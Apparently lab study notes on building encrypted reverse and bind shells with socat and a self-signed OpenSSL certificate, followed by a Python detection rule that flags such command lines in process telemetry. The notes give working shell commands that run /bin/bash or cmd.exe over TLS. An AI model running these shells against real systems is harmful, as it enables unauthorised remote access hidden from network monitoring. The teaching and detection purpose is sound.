Socat Encrypted

What is Socat-Encrypted

Socat is like netcat on steroids. It can do all of the same things, and many more. Socat shells are usually more stable than netcat shells out of the box. In this sense it is vastly superior to netcat; however, there are two big catches:

  1. The syntax is more difficult
  2. Netcat is installed on virtually every Linux distribution by default. Socat is very rarely installed by default.

Command

socat <options> TCP4:IP:PORT

or

socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 - 
  • Options ---> https://www.redhat.com/sysadmin/getting-started-socat

  • TCP4 ---> Type of network connection

  • Certificate Creation (Important Before Using Socat)

    We first need to generate a certificate in order to use encrypted shells. This is easiest to do on our attacking machine:

    openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

    This command creates a 2048-bit RSA key with a matching cert file, self-signed, and valid for just under a year. When you run this command it will ask you to fill in information about the certificate. This can be left blank, or filled randomly.

    We then need to merge the two created files into a single .pem file:

    cat shell.key shell.crt > shell.pem  

    Now, when we set up our reverse shell listener, we use:

    socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

    This sets up an OPENSSL listener using our generated certificate. verify=0 tells the connection to not bother trying to validate that our certificate has been properly signed by a recognised authority. Please note that the certificate must be used on whichever device is listening.

    To connect back, we would use:

    socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

    The same technique would apply for a bind shell:

    Target:

    socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

    Attacker:

    socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -  

    Again, note that even for a Windows target, the certificate must be used with the listener, so copying the PEM file across for a bind shell is required.

    The following image shows an OPENSSL Reverse shell from a Linux target. As usual, the target is on the right, and the attacker is on the left:

    This technique will also work with the special, Linux-only TTY shell covered in the previous task -- figuring out the syntax for this will be the challenge for this task. Feel free to use the Linux Practice box (deployable at the end of the room) to experiment if you're struggling to obtain the answer.
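
Seen from the detection side, every encrypted-shell command above has the same shape: an OPENSSL address carrying verify=0, and on the target side an EXEC address. The following added example (not part of the original notes) parses socat command lines from process-creation telemetry and flags that pairing; the host names, sample events and severity labels are constructed assumptions, and only the address spellings used on this page (plus socat's SYSTEM address) are matched.

```python
import os
import shlex

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("web01", "socat OPENSSL:203.0.113.5:443,verify=0 EXEC:/bin/bash"),
    ("win07", "socat.exe OPENSSL-LISTEN:8443,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes"),
    ("jump1", "socat -d -d OPENSSL-LISTEN:443,cert=shell.pem,verify=0 -"),
    ("db02", "socat TCP4-LISTEN:8080,fork TCP4:10.0.0.7:80"),
    ("app03", "socat OPENSSL:vault.example.internal:8200,cafile=ca.pem -"),
    ("app04", "curl -k https://203.0.113.5/"),
]


def parse_address(spec):
    """Split one socat address 'KEYWORD:params,opt=val,flag' into (keyword, options)."""
    head, *raw_opts = spec.split(",")
    keyword = head.split(":", 1)[0].upper()
    options = {}
    for opt in raw_opts:
        name, _, value = opt.partition("=")
        options[name.lower()] = value
    return keyword, options


def classify(cmdline):
    """Return 'high', 'medium' or None for one command line."""
    argv = shlex.split(cmdline)
    if len(argv) < 3 or os.path.basename(argv[0]).lower() not in ("socat", "socat.exe"):
        return None
    # socat's form is: socat [options] <address> <address>
    addresses = [parse_address(a) for a in argv[-2:]]
    tls = [opts for kw, opts in addresses if kw.startswith("OPENSSL")]
    # Peer verification is on unless verify=0 is given explicitly.
    if not any(opts.get("verify") == "0" for opts in tls):
        return None
    spawns_program = any(kw in ("EXEC", "SYSTEM") for kw, _ in addresses)
    return "high" if spawns_program else "medium"


def triage(events):
    """Keep only the events the rule flags, as (host, severity, command line)."""
    hits = [(host, classify(cmd), cmd) for host, cmd in events]
    return [h for h in hits if h[1] is not None]


if __name__ == "__main__":
    for host, severity, cmd in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host:6} {cmd}")
```

The forwarder on db02 and the TLS client on app03 that keeps verification enabled are not flagged, which keeps the rule narrow enough to alert on.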